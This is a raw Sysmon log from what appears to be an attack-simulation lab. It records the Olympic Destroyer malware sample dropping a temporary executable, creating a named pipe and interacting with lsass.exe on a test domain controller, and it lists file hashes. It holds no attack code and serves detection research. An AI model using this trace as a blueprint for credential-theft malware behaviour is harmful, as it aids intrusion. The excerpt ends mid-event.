10:56:39.758{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.742{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.579{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63A076A05CA342257BB51C17BAA51586,SHA256=1BC5F763488C97AE3D5E1F9149688133449FA414ADA21DF56143C3C86F5F843F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.479{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.479{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.479{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.479{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.479{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.479{C8EA50B7-12E6-6216-4B05-000000003802}67926764C:\Temp\olympic_destroyer.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Temp\olympic_destroyer.exe+b16e|C:\Temp\olympic_destroyer.exe+3474|C:\Temp\olympic_destroyer.exe+6c8e|C:\Temp\olympic_destroyer.exe+792b|C:\Temp\olympic_destroyer.exe+7a71|C:\Temp\olympic_destroyer.exe+b4a4|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.451{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe----- 123 \\.\pipe\D2D7F4DC-5091-4E5C-8CCE-9DF9AB8F1271C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=68970B2CD5430C812BEF5B87C1ADD6EA,SHA256=E4E1E3C44E01C60FD433C6283BD8CD15A9941E1CBAAD72E6409CC92E2E91263E,IMPHASH=DA1C2D7ACFE54DF797BFB1F470257BC3{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.442{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000290017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:56:39.442{C8EA50B7-12E6-6216-4B05-000000003802}6792\D2D7F4DC-5091-4E5C-8CCE-9DF9AB8F1271C:\Temp\olympic_destroyer.exe 11241100x8000000000000000290016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localEXE2022-02-23 10:56:39.442{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exeC:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe2022-02-23 10:56:39.442 354300x8000000000000000217631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:37.555{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51409-false10.0.1.12-8000- 23542300x8000000000000000217630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:39.199{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86DBE9FBBD744CB3A3C4B24E2F6EA07A,SHA256=6E2E9E1746BA397D7025EF937BA95AB2A89FA7CA7CF5FD1A03E6767619AF9682,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.301{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.300{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.299{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.299{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.298{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.297{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.d